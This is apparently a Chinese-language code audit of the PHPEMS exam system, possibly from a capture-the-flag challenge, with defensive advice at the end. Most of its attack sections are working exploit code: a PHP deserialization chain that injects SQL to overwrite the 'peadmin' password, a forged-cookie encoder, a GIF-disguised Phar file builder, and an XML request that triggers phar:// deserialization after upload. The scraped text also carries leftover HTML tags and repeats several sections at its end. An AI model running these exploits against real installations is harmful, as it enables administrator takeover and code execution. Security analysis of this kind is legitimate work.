PHPEMS代码审计与漏洞利用分析<\/h1>

1. 系统概述<\/h2>
PHPEMS是一个基于PHP的考试管理系统，本次分析主要针对其存在的安全漏洞，包括SQL注入和Phar反序列化漏洞。<\/p>

2. 漏洞分析<\/h2>

2.1 SQL注入漏洞<\/h3>

2.1.1 漏洞位置<\/h4>

漏洞存在于SQL语句构建过程中，关键代码如下：<\/p>

$db_limits =<\/span> $this-><\/span>_mostlimits<\/span>;
<\/span><\/span>$db_groups =<\/span> $db_groups?<\/span>' GROUP BY '<\/span>.<\/span>$db_groups:<\/span>''<\/span>;
<\/span><\/span>$db_orders =<\/span> $db_orders?<\/span>' ORDER BY '<\/span>.<\/span>$db_orders:<\/span>''<\/span>;
<\/span><\/span>$sql =<\/span> 'UPDATE '<\/span>.<\/span>$db_tables.<\/span>' SET '<\/span>.<\/span>$parsql.<\/span>' WHERE '<\/span>.<\/span>$db_query.<\/span>$db_groups.<\/span>$db_orders.<\/span>' LIMIT '<\/span>.<\/span>$db_limits;
<\/span><\/span><\/code><\/pre>2.1.2 漏洞原理<\/h4>

$db_tables<\/code>属性可通过反序列化控制<\/li>
SQL语句直接拼接用户可控数据，未使用预编译<\/li>
通过反序列化可以完全控制表名部分，实现SQL注入<\/li>
<\/ol>
2.1.3 利用链构造<\/h4>
利用链涉及以下类：<\/p>

session<\/code>类：包含pdosql<\/code>和pepdo<\/code>对象<\/li>
pdosql<\/code>类：包含可控的tablepre<\/code>属性<\/li>
pepdo<\/code>类：数据库连接类<\/li>
<\/ol>
2.1.4 利用EXP<\/h4>
<?<\/span>php<\/span>  
<\/span><\/span>namespace<\/span> PHPEMS<\/span>{  
<\/span><\/span>    class<\/span> session<\/span>{  
<\/span><\/span>    public<\/span> function<\/span> __construct()  
<\/span><\/span>    {  
<\/span><\/span>        $this-><\/span>sessionid<\/span>=<\/span>"1111111"<\/span>;  
<\/span><\/span>        $this-><\/span>pdosql<\/span>=<\/span> new<\/span> pdosql<\/span>();  
<\/span><\/span>        $this-><\/span>db<\/span>=<\/span> new<\/span> pepdo<\/span>();  
<\/span><\/span>        }  
<\/span><\/span>    }  
<\/span><\/span>    class<\/span> pdosql<\/span>  
<\/span><\/span>    {  
<\/span><\/span>        private<\/span> $db ;  
<\/span><\/span>        public<\/span> function<\/span> __construct()  
<\/span><\/span>        {  
<\/span><\/span>            $this-><\/span>tablepre<\/span> =<\/span> 'x2_user set userpassword="e10adc3949ba59abbe56e057f20f883e" where username="peadmin";#--'<\/span>;  
<\/span><\/span>            $this-><\/span>db<\/span>=<\/span>new<\/span> pepdo<\/span>();  
<\/span><\/span>        }  
<\/span><\/span>    }  
<\/span><\/span>    class<\/span> pepdo<\/span>  
<\/span><\/span>    {  
<\/span><\/span>        private<\/span> $linkid =<\/span> 0<\/span>;  
<\/span><\/span>    }  
<\/span><\/span>}  
<\/span><\/span>
<\/span><\/span>namespace<\/span> {  
<\/span><\/span>    $info =<\/span> "%2595%259Cfs%25AF%25D9lon%2586%25D9%25C8%25D7%25D6%25A0%25A1%25A2%25CA%2594X%259D%25AC%259Ccg%259DS%2596i%259B%259B%25C7%2599%2598kp%2595%259Eg%2598%2598%25C7%25CA%259B%259A%2594lid%2593%2592%259B%2594i%25C3fh%2598c%2587p%25AC%259F%259Dn%2584%25A6%259E%25A7%25D9%259B%25A5%25A2%25CD%25D6%2585%259F%25D6qkn%2583ah%2599g%2592%255Ee%2591b%2587p%25AC%259F%2595j%259CU%25AC%2599%25D9%25A5%259F%25A3%25D2%25DA%25CC%25D1%25C8%25A3%259B%25A1%25CA%25A4X%259D%25A2%259Cal%2593g%259Bhk%2595%259Bm%259D%25B0"<\/span>;
<\/span><\/span>    $info =<\/span> urldecode<\/span>($info);  
<\/span><\/span>    $info =<\/span> urldecode<\/span>($info);  
<\/span><\/span>    $info =<\/span> substr<\/span>($info,64<\/span>,32<\/span>);  
<\/span><\/span>    
<\/span><\/span>    function<\/span> reverse<\/span>($payload1,$payload2)  
<\/span><\/span>    {  
<\/span><\/span>        $il =<\/span> strlen<\/span>($payload1);  
<\/span><\/span>        $key=<\/span> ""<\/span>;  
<\/span><\/span>        $kl =<\/span> 32<\/span>;  
<\/span><\/span>        for<\/span>($i =<\/span> 0<\/span>; $i <<\/span> $il; $i++<\/span>)  
<\/span><\/span>        {  
<\/span><\/span>            $p =<\/span> $i%<\/span>$kl;  
<\/span><\/span>            $key .=<\/span> chr<\/span>(ord<\/span>($payload1[$i])-<\/span>ord<\/span>($payload2[$p]));  
<\/span><\/span>        }  
<\/span><\/span>        return<\/span> $key;  
<\/span><\/span>    }  
<\/span><\/span>
<\/span><\/span>    define<\/span>(CS1<\/span>,reverse<\/span>($info, ':"sessionip";s:9:"127.0.0.1";s:1'<\/span>));  
<\/span><\/span>    
<\/span><\/span>    function<\/span> encode<\/span>($info)  
<\/span><\/span>    {  
<\/span><\/span>        $info =<\/span> serialize<\/span>($info);  
<\/span><\/span>        $key =<\/span> CS1<\/span>;  
<\/span><\/span>        $kl =<\/span> strlen<\/span>($key);  
<\/span><\/span>        $il =<\/span> strlen<\/span>($info);  
<\/span><\/span>        for<\/span>($i =<\/span> 0<\/span>; $i <<\/span> $il; $i++<\/span>)  
<\/span><\/span>        {  
<\/span><\/span>            $p =<\/span> $i%<\/span>$kl;  
<\/span><\/span>            $info[$i] =<\/span> chr<\/span>(ord<\/span>($info[$i])+<\/span>ord<\/span>($key[$p]));  
<\/span><\/span>        }  
<\/span><\/span>        return<\/span> urlencode<\/span>($info);  
<\/span><\/span>    }  
<\/span><\/span>    
<\/span><\/span>    $session =<\/span> new<\/span> \PHPEMS\session<\/span>();  
<\/span><\/span>    $array =<\/span> array<\/span>("sessionid"<\/span>=><\/span>"123123123"<\/span>, $session);  
<\/span><\/span>    echo<\/span>(urlencode<\/span>(encode<\/span>($array))).<\/span>"<\/span>\n<\/span>"<\/span>;  
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.1.5 利用方式<\/h4>
构造恶意Cookie发送请求：<\/p>
GET \/index.php HTTP\/1.1
Host: exam.cyan.wetolink.com
Cookie: exam_currentuser=[生成的恶意Cookie]
<\/code><\/pre>
2.2 Phar反序列化漏洞（非预期）<\/h3>
2.2.1 漏洞位置<\/h4>
app\/weixin\/controller\/index.api.php<\/code>中的file_get_contents<\/code>函数调用<\/p>
2.2.2 漏洞原理<\/h4>

系统接收XML格式的微信消息<\/li>
通过file_get_contents<\/code>处理用户可控的URL参数<\/li>
可使用phar:\/\/<\/code>协议触发反序列化<\/li>
<\/ol>
2.2.3 利用步骤<\/h4>

构造恶意Phar文件<\/strong>：<\/li>
<\/ol>
<?<\/span>php<\/span>  
<\/span><\/span>namespace<\/span> PHPEMS<\/span>{  
<\/span><\/span>    class<\/span> session<\/span>{  
<\/span><\/span>        public<\/span> function<\/span> __construct()  
<\/span><\/span>        {  
<\/span><\/span>            $this-><\/span>sessionid<\/span>=<\/span>"1111111"<\/span>;  
<\/span><\/span>            $this-><\/span>pdosql<\/span>=<\/span> new<\/span> pdosql<\/span>();  
<\/span><\/span>            $this-><\/span>db<\/span>=<\/span> new<\/span> pepdo<\/span>();  
<\/span><\/span>        }  
<\/span><\/span>    }  
<\/span><\/span>    class<\/span> pdosql<\/span> {  
<\/span><\/span>        private<\/span> $db ;  
<\/span><\/span>        public<\/span> function<\/span> __construct() {  
<\/span><\/span>            $this-><\/span>tablepre<\/span> =<\/span> 'x2_user set userpassword="e10adc3949ba59abbe56e057f20f883e" where username="peadmin";#--'<\/span>;  
<\/span><\/span>            $this-><\/span>db<\/span>=<\/span>new<\/span> pepdo<\/span>();  
<\/span><\/span>        }  
<\/span><\/span>    }  
<\/span><\/span>    class<\/span> pepdo<\/span> {  
<\/span><\/span>        private<\/span> $linkid =<\/span> 0<\/span>;  
<\/span><\/span>    }  
<\/span><\/span>}  
<\/span><\/span>
<\/span><\/span>namespace<\/span> {  
<\/span><\/span>    $o =<\/span> new<\/span> \PHPEMS\session<\/span>();  
<\/span><\/span>    $filename =<\/span> '111.phar'<\/span>;
<\/span><\/span>    file_exists<\/span>($filename) ?<\/span> unlink<\/span>($filename) :<\/span> null<\/span>;  
<\/span><\/span>    $phar=<\/span>new<\/span> Phar<\/span>($filename);  
<\/span><\/span>    $phar-><\/span>startBuffering<\/span>();  
<\/span><\/span>    $phar-><\/span>setStub<\/span>("GIF89a<?php __HALT_COMPILER(); ?>"<\/span>);  
<\/span><\/span>    $phar-><\/span>setMetadata<\/span>($o);  
<\/span><\/span>    $phar-><\/span>addFromString<\/span>("foo.txt"<\/span>,"bar"<\/span>);  
<\/span><\/span>    $phar-><\/span>stopBuffering<\/span>();  
<\/span><\/span>    system<\/span>('copy 111.phar 111.gif'<\/span>);  
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
上传Phar文件<\/strong>：<\/li>
<\/ol>
通过app\/document\/controller\/fineuploader.api.php<\/code>上传接口上传恶意文件，获取文件路径：<\/p>
{"success"<\/span>:true<\/span>,"thumb"<\/span>:"files\/attach\/images\/content\/20240204\/17070404291915.jpg"<\/span>,"title"<\/span>:"1.jpg"<\/span>}
<\/span><\/span><\/code><\/pre>
触发反序列化<\/strong>：<\/li>
<\/ol>
构造XML请求触发file_get_contents<\/code>：<\/p>
<xml><\/span>
<\/span><\/span>    <ToUserName><\/span><![CDATA[zjacky]]><\/span><\/ToUserName><\/span>
<\/span><\/span>    <FromUserName><\/span><![CDATA[zjacky]]><\/span><\/FromUserName><\/span>
<\/span><\/span>    <MsgType><\/span><![CDATA[image]]><\/span><\/MsgType><\/span>
<\/span><\/span>    <MediaId><\/span><![CDATA[zjacky]]><\/span><\/MediaId><\/span>
<\/span><\/span>    <PicUrl><\/span><![CDATA[phar:\/\/\/path\/to\/uploaded\/file]]><\/span><\/PicUrl><\/span>
<\/span><\/span>    <CreateTime><\/span>1707039415<\/CreateTime><\/span>
<\/span><\/span>    <MsgId><\/span>xxx<\/MsgId><\/span>
<\/span><\/span><\/xml><\/span>
<\/span><\/span><\/code><\/pre>3. 防御建议<\/h2>


SQL注入防御<\/strong>：<\/p>

使用预编译语句<\/li>
对表名、字段名等SQL元素进行严格过滤<\/li>
避免直接拼接用户输入到SQL语句中<\/li>
<\/ul>
<\/li>

反序列化防御<\/strong>：<\/p>

避免反序列化用户可控数据<\/li>
使用allowed_classes<\/code>限制可反序列化的类<\/li>
对phar:\/\/<\/code>等危险协议进行过滤<\/li>
<\/ul>
<\/li>

文件上传防御<\/strong>：<\/p>

检查文件内容而不仅是扩展名<\/li>
限制上传文件类型<\/li>
将上传文件存储在非web可访问目录<\/li>
<\/ul>
<\/li>

其他建议<\/strong>：<\/p>

实现完善的输入验证和输出编码<\/li>
使用安全的加密方式处理敏感数据<\/li>
定期进行安全审计和代码审查<\/li>
<\/ul>
<\/li>
<\/ol>
4. 总结<\/h2>
PHPEMS系统中存在多个高危漏洞，包括：<\/p>

通过反序列化控制的SQL注入漏洞<\/li>
Phar反序列化导致的代码执行漏洞<\/li>
<\/ol>
这些漏洞组合利用可导致系统完全沦陷，建议用户及时更新或修复。<\/p>

PHPEMS代码审计与漏洞利用分析<\/h1>

1. 系统概述<\/h2> PHPEMS是一个基于PHP的考试管理系统，本次分析主要针对其存在的安全漏洞，包括SQL注入和Phar反序列化漏洞。<\/p>

2. 漏洞分析<\/h2>

2.1 SQL注入漏洞<\/h3>

2.2 Phar反序列化漏洞（非预期）<\/h3>

2.2.1 漏洞位置<\/h4> app\/weixin\/controller\/index.api.php<\/code>中的file_get_contents<\/code>函数调用<\/p>

4. 总结<\/h2> PHPEMS系统中存在多个高危漏洞，包括：<\/p> 通过反序列化控制的SQL注入漏洞<\/li> Phar反序列化导致的代码执行漏洞<\/li> <\/ol> 这些漏洞组合利用可导致系统完全沦陷，建议用户及时更新或修复。<\/p>

1. 系统概述<\/h2>
PHPEMS是一个基于PHP的考试管理系统，本次分析主要针对其存在的安全漏洞，包括SQL注入和Phar反序列化漏洞。<\/p>

2.2.1 漏洞位置<\/h4>
`app\/weixin\/controller\/index.api.php<\/code>中的file_get_contents<\/code>函数调用<\/p>`

4. 总结<\/h2>
PHPEMS系统中存在多个高危漏洞，包括：<\/p>

通过反序列化控制的SQL注入漏洞<\/li>
Phar反序列化导致的代码执行漏洞<\/li> <\/ol>
这些漏洞组合利用可导致系统完全沦陷，建议用户及时更新或修复。<\/p>